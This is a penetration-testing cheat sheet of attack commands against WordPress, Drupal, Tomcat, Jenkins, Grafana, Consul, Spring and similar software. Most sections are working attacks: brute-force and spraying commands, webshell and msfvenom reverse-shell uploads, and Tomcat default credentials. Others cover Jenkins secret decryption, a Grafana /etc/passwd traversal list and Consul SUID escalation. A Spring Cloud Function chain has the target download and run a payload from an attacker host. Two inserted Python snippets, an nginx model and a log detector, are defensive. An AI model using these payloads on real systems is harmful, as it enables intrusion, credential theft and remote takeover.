
# CMS / Servers / Others

## 00. Webroot

```bash
/var/www/html/            # Apache
/usr/local/nginx/html/    # Nginx
c:\inetpub\wwwroot\       # IIS
C:\xampp\htdocs\          # XAMPP
```

## 01. WordPress

* Scan

```bash
## ------------------| Basic
wpscan -e vt,tt,u,ap --url <URL>
wpscan -e vt,tt,u,ap -o wpscan.log --url <URL>

## ------------------| Plugin detection
wpscan -e ap --plugins-detection aggressive --url <URL>

## ------------------| Default Locations
/wp-content/plugins/akismet/index.php
/wp-content/themes/twentytwenty/404.php
/wp-content/themes/twentytwentyone/404.php
/wp-content/themes/twentytwentytwo/404.php
/wp-content/plugins/revslider/public/index.php
/wp-content/plugins/contact-form-7/wp-contact-form-7.php
```

* Bruteforce password/username

```bash
## ------------------| With WPScan
wpscan -U <UserName/List> -P <Password/List> --url <URL>

## ------------------| With WPForce
git clone https://github.com/n00py/WPForce.git && cd WPForce
python2 wpforce.py -w <Password/List> -i <UserName/List> -u <URL>

## ------------------| With WpCrack
wget https://raw.githubusercontent.com/22XploiterCrew-Team/WpCrack/1.x/WpCrack.py
python WpCrack.py -t <URL> --p <Password/List> -u <UserName>
```

* Username/Password

```sql
select user_login,user_pass from wp_users;
```

* Webshell

```bash
## ------------------| With WPForce
git clone https://github.com/n00py/WPForce.git && cd WPForce
python yertle.py -u "<username>" -p "<password>" -t "<URL>" -i

## Or

## ------------------| Create Plugin
wget https://raw.githubusercontent.com/leonjza/wordpress-shell/master/shell.php
zip -r shell.zip shell.php

## ------------------| Upload to
http://<IP>/wp-admin/plugin-install.php

## ------------------| Execute shell
http://<IP>/wp-content/plugins/shell/shell.php?cmd=id
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python3 -c 'import urllib.parse; print(urllib.parse.urlencode({"cmd":"uname -a"}))')"

## ------------------| Reverse shell (default port:443)
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python3 -c 'import urllib.parse; print(urllib.parse.urlencode({"ip":"<IP>"}))')"
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python3 -c 'import urllib.parse; print(urllib.parse.urlencode({"ip":"<IP>","port":"4545"}))')"
```

## 02. Joomla

```bash
## ------------------| Identify version
# Navigate to
/administrator/manifest/files/joomla.xml
# and check the <version> tag, e.g.
<version>3.7.5</version>

## ------------------| Run scan
joomscan -u <URL>
```

## 03. Drupal

#### 03.1 Enumeration

```bash
## ------------------| Username enumeration
### Check whether we can register a new user (look for "name is already taken")
/user/register

### Check the access status of
/user/<number>
/user/1
### 403 --> user exists
### 404 --> user does not exist

## ------------------| Hidden pages
wfuzz -c -z range,1-500 --hc 404 http://<IP>/node/FUZZ
```

#### 03.2 Upload shell

```bash
## ------------------| Check "PHP filter" module status
/modules/php
### if the status is 403 --> the "PHP filter" module exists/is installed

## ------------------| Enable the "PHP filter" module
Modules --> tick "PHP filter" --> Save

## ------------------| Upload shell
Add content --> Basic Page/Article --> <paste_shell> --> select "PHP code" as the Text format --> Preview
```

## 04. Tomcat

```bash
## ------------------| Endpoint permissions
/manager/html      # <--- roles="manager-gui"
/manager/text/list # <--- roles="manager-script"  [If we have /manager, we can use curl to upload a WAR file :)]
/host-manager/html # <--- roles="admin-gui"

## ------------------| Path Normalization
/manager/notexists/..;/html/
/manager/;name=notexists/html/
/;name=notexists/manager/        # <--- does not work for uploading WAR files
/notexists/..;/manager/          # <--- does not work for uploading WAR files
## Remember to put '/' at the end ^

## ------------------| Common Creds
tomcat:s3cret
tomcat:s3cr3t
admin:s3cr3t
tomcat:tomcat
admin:admin
admin:tomcat
tomcat:Tomcatadm
tomcat:TomcatAdm
tomcat:Tomcatadn
admin:<NOTHING>

## ------------------| Upload paths
/manager/deploy?war=file&path=/shell    ## Tomcat6
/manager/text/deploy?path=/shell        ## Tomcat7 and above

## ------------------| Upload via curl
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f war > shell.war
curl -u 'username:password' -T shell.war http://<IP>:8080/manager/text/deploy?path=/h4rithd

## ------------------| Manual Upload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f war > shell.war
## Then copy shell.war into the \tomcat\webapps\ directory
## Then restart the service with \bin\startup.[sh/bat]; Tomcat extracts the WAR on startup
## Now you can use http://<IP>/shell/
```

## 05. Nginx

* [Path traversal via misconfigured NGINX alias.](https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/)

```bash
## ------------------| If the config looks like this (prefix without a trailing slash, used with an alias directive)
location /admin {
    <--code-->
}

## ------------------| It is vulnerable to path traversal (off-by-slash); try this
admin../config.php
```
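As an added illustration (not code from the original page), the following Python models how nginx resolves a request under a prefix `location` that uses an `alias` directive, and places the weak configuration beside the corrected one. The webroot `/var/www` and the alias path `/var/www/admin/` are assumed.

```python
import posixpath

# Assumed layout for the example: the admin files live under /var/www/admin/.
WEBROOT = "/var/www"
ADMIN_DIR = WEBROOT + "/admin"


def nginx_alias_resolve(location, alias, request_uri):
    """Model nginx prefix matching with an `alias` directive: nginx first
    removes dot-segments from the URI, then replaces the matched prefix with
    the alias and appends the remainder verbatim. Returns (matched, path)."""
    uri = posixpath.normpath(request_uri)
    if not uri.startswith(location):
        return False, None
    return True, posixpath.normpath(alias + uri[len(location):])


def escapes(path, allowed_dir):
    """True when the resolved filesystem path lies outside allowed_dir."""
    return not (path == allowed_dir or path.startswith(allowed_dir + "/"))


# Weak: `location /admin` has no trailing slash, so "/admin../x" matches the
# prefix and the leftover "../x" is glued onto the alias.
VULNERABLE = ("/admin", ADMIN_DIR + "/")
# Fixed: prefix and alias both end in "/", so the remainder can never start
# with "..": "/admin../x" no longer matches this location at all.
FIXED = ("/admin/", ADMIN_DIR + "/")


def check(config, request_uri):
    """Return (matched, resolved_path, escaped_admin_dir) for one request."""
    matched, path = nginx_alias_resolve(*config, request_uri)
    return matched, path, bool(matched and escapes(path, ADMIN_DIR))
```

Note that nginx's own dot-segment removal already neutralises `/admin/../config.php`; only the off-by-slash form reaches the filesystem, and the trailing slash on the location prefix is what closes it.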

## 05. SharePoint / OWA

#### 05.1 SharePoint

```bash
## ------------------| Important directories 
/_layouts/viewlsts.aspx
```

#### 05.2 OWA

```bash
## ------------------| Setup
git clone https://github.com/byt3bl33d3r/SprayingToolkit      
cd SprayingToolkit/
pip3 install -r requirements.txt

## ------------------| Create username list (the default format is {f}{last})
python3 spindrift.py users.txt --target <IP> > newuserlist.txt
python3 spindrift.py users.txt --format "{f}.{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}.{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}.{l}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{l}" --target <IP> >> newuserlist.txt

## ------------------| Bruteforce
python3 atomizer.py owa 10.10.10.210 'Passw0rd' newuserlist.txt --interval 0:00:01
python3 atomizer.py owa 10.10.10.210 /usr/share/seclists/Passwords/probable-v2-top207.txt newuserlist.txt --interval 0:00:01
```

## 06. Jenkins

* Interesting endpoints

```bash
/manage
/script
```

* Configuration files

```bash
## ------------------| Linux
/var/lib/jenkins/users/admin_*/config.xml
/var/lib/jenkins/config.xml

## ------------------| Windows
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\config.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\users\admin_*\config.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets\master.key 
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets\hudson.util.Secret
```

* Reset password \[Read the full post [here](https://blog.searce.com/jenkins-change-the-forgotten-password-525169ba1c34)]

```bash
## ------------------| Method II
## Edit the following file
sudo vi /var/lib/jenkins/users/admin_5103638315737262589/config.xml
## The bcrypt password hash is stored under the <passwordHash> tag [the hash below is for the password h4rithd]
<passwordHash>#jbcrypt:$2a$04$gcRUhfwsCQlQKbSTgpFCKOdV9uQuD5/vXwiU1bgULDzW4JB/pNp5S</passwordHash>
## Restart the service
sudo systemctl restart jenkins

## ------------------| Decrypt Password
## If you have access to /script, run the following in the script console
## (take the encrypted value from \users\config.xml)
hudson.util.Secret.decrypt '<HASH>'
## If not,
## Download the following files
\users\admin_17207690984073220035\config.xml
\secrets\master.key
\secrets\hudson.util.Secret
## Download the tool
wget https://raw.githubusercontent.com/gquere/pwn_jenkins/master/offline_decryption/jenkins_offline_decrypt.py
## Execute
python jenkins_offline_decrypt.py master.key hudson.util.Secret config.xml
```

* Remote Code Execution

{% tabs %}
{% tab title="Low level user" %}

* Create New Job

![](/files/8KD53BFy3kHOZ0TKzgAw) ![](/files/QZluL6lZFKdCpiIA2q5b)

* Schedule Method

![](/files/s39jaOg1zbrqjGegekSJ) ![](/files/jcwnM3Qf4AFGXCdKaqsH)

![](/files/lqcRyECWzsvywPUrLlqp) ![](/files/bc2OaanIHvzEPplf2RCQ)

* Trigger Remotely Method

![](/files/DdPDJ2l0m3w5A18AkXHa) ![](/files/emFfI3Jilb0RtWkj0Uaf)

```bash
## ------------------| Trigger the job
curl "http://[username]:[token]@[host]/job/[job name]/build?token=[token name]"
## Ex: curl "http://h4rithd:11afe9af0327e90fed163da849a39837bc@object.htb:8080/job/TestRun/build?token=h4rithdToken"
```

![](/files/YLqE3L4SAv6OeCIyI65R) ![](/files/ZKMhiBiFh3CdrwSxt0E4)
{% endtab %}
{% endtabs %}

## 07. Grafana

* [Best reference: jas502n/Grafana-CVE-2021-43798](https://github.com/jas502n/Grafana-CVE-2021-43798)
* Config files

```bash
## ------------------| Config file locations
/etc/grafana/grafana.ini
$WORKING_DIR/conf/defaults.ini
/usr/local/etc/grafana/grafana.ini
```

* [Unauthorized reading of files in Grafana](https://github.com/Vulnmachines/grafana-unauth-file-read) \[CVE-2021-43798] - [videoPOC](https://www.youtube.com/watch?v=mMEzHP96Jhg)

```bash
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd
```
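Added example, not part of the original cheat sheet: a small detector run over constructed access-log lines that flags the request patterns from the Drupal, Tomcat, Nginx, Jenkins and Grafana sections above (`..;` path parameters and `;name=` segments, `/manager/text/deploy`, `/public/plugins/<name>/../`, the `/admin../` off-by-slash, `/script`, and bursts of `/user/N` probes answered 403/404). The log lines, the IPs and the threshold of five probes are assumptions.

```python
import re

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /manager/notexists/..;/html/ HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "PUT /manager/text/deploy?path=/shell HTTP/1.1" 200 40
10.0.0.6 - - [01/Jan/2024:10:00:03 +0000] "GET /public/plugins/alertlist/../../../../etc/passwd HTTP/1.1" 200 1400
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /admin../config.php HTTP/1.1" 200 300
10.0.0.8 - - [01/Jan/2024:10:00:05 +0000] "GET /user/1 HTTP/1.1" 403 120
10.0.0.8 - - [01/Jan/2024:10:00:05 +0000] "GET /user/2 HTTP/1.1" 403 120
10.0.0.8 - - [01/Jan/2024:10:00:06 +0000] "GET /user/3 HTTP/1.1" 404 120
10.0.0.8 - - [01/Jan/2024:10:00:06 +0000] "GET /user/4 HTTP/1.1" 404 120
10.0.0.8 - - [01/Jan/2024:10:00:07 +0000] "GET /user/5 HTTP/1.1" 403 120
10.0.0.9 - - [01/Jan/2024:10:00:08 +0000] "GET /index.php HTTP/1.1" 200 900
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<uri>\S+)[^"]*" (?P<status>\d{3})'
)

# Per-request signatures, one per technique from the sections above.
SIGNATURES = [
    ("tomcat_path_param_bypass", re.compile(r"\.\.;|/;[^/]*=")),  # /..;/ and /;name=x/
    ("tomcat_manager_deploy", re.compile(r"^/manager/(?:text/)?deploy")),
    ("grafana_plugin_traversal", re.compile(r"^/public/plugins/[^/]+/\.\./")),
    ("nginx_alias_off_by_slash", re.compile(r"^/[^/]+\.\./")),  # /admin../
    ("jenkins_script_console", re.compile(r"^/script(?:[/?]|$)")),
]
USER_PROBE = re.compile(r"^/user/\d+$")  # Drupal /user/<number> existence oracle


def detect(log_text, enum_threshold=5):
    """Return (rule, ip, detail) findings. Per-request rules fire on each matching
    line; Drupal enumeration fires once per IP after enum_threshold distinct
    /user/N probes were answered 403 (user exists) or 404 (does not exist)."""
    findings, probes = [], {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        ip, uri, status = m["ip"], m["uri"], m["status"]
        for rule, pattern in SIGNATURES:
            if pattern.search(uri):
                findings.append((rule, ip, uri))
        if USER_PROBE.match(uri) and status in ("403", "404"):
            probes.setdefault(ip, set()).add(uri)
    for ip, uris in probes.items():
        if len(uris) >= enum_threshold:
            findings.append(("drupal_user_enumeration", ip, f"{len(uris)} probes"))
    return findings
```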

## 08. Consul

```bash
echo 'chmod 4755 /bin/dash' > /dev/shm/test.sh
curl --header "X-Consul-Token: <TOKEN-********-****>" --request PUT -d '{"ID": "meow", "Name": "meow", "Address": "127.0.0.1", "Port": 80, "check": {"Args": ["/usr/bin/bash", "/dev/shm/test.sh"], "interval": "10s", "timeout": "1s"}}' http://127.0.0.1:8500/v1/agent/service/register
dash -p
```

## 09. Spring Framework

* [Spring4Shell \[CVE-2022-22965\]](https://github.com/sunnyvale-it/CVE-2022-22965-PoC)

```bash
### Spring Boot version 2.6.5
## ------------------| Manual
wget https://raw.githubusercontent.com/sunnyvale-it/CVE-2022-22965-PoC/main/exploit-core.py
python3 exploit-core.py --url http://10.10.11.204:8080/
```

* Spring Cloud Function vulnerability (CVE-2022-22963)

```bash
## ------------------| Manual
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=4545 -f elf > h4rithd.elf
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl <IP>/h4rithd.elf -o /tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("chmod +x /tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("/tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'

## ------------------| Metasploit
use exploit/multi/http/spring_cloud_function_spel_injection
```

